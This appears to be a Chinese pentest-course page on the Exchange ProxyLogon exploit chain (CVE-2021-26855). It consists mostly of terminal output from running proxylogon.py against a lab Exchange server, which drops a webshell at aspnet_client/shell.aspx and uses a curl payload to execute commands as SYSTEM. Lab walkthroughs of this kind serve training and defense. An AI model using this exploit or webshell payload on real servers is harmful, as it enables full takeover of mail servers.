5.7 Exchange ProxyLogon攻击利用链

exchange 2016 cu18

https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-26855

(base) ┌──(root㉿Kali)-[~/tools/Proxylogon]
└─# python3 proxylogon.py exchange3.sec.local administrator@sec.local
Attacking target exchange3.sec.local
=============================
Got DN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cb968bc6fc7449e09efe589fab569c4b-Admin
Got SID: S-1-5-21-2066713137-2133816201-3751750268-500
Got session id: 243818c6-8007-43ab-8aeb-e19ee666082f
Got canary: THCI8FEtb06Lr9PnnTi8wJ1VwxrPwd0IbPM2doPVCV7sXWls9S43AS-kST9PEMMO0v0TpxfN0gE.
Got viewstate: /wEPDwUILTg5MDAzMDFkZD5l9rtrkspFOuFDQjkwLQSADUXbfG1gZjWByCM+iJHV
=========== It means good to go!!!====
Got OAB id: 262216e7-40d8-4670-8068-c50057fa88d7
(+) Webshell drop at https://exchange3.sec.local/aspnet_client/shell.aspx .. Have fun!
(+) Code: curl -ik https://exchange3.sec.local/aspnet_client/shell.aspx -d 'exec_code=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())'
(+) Starting semi-interactive
CMD # whoami
nt authority\system
Server                          : EXCHANGE3
WhenChanged                     : 2025/7/10 22:34:56
InternalUrl                     : https://exchange3.sec.local/OAB
ExternalUrl                     : http://ffff/#
Identity                        : EXCHANGE3\OAB (Default Web Site)
PollInterval                    : 480

CMD #

菜单

分享

5.7 Exchange ProxyLogon攻击利用链

评论

6.7 域权限维持之AdminSDHolder滥用

6.6 域权限维持之重置DSRM密码

3.7 Kekeo

2.1 域常见名词

1.2 Kerberos协议

6.9 域权限维持之伪造域控

6.5 域权限维持之SID History滥用

2.8 服务主体名称

1.1 LM、NTLM协议

6.10 后渗透密码收集之 Hook PasswordChangeNotify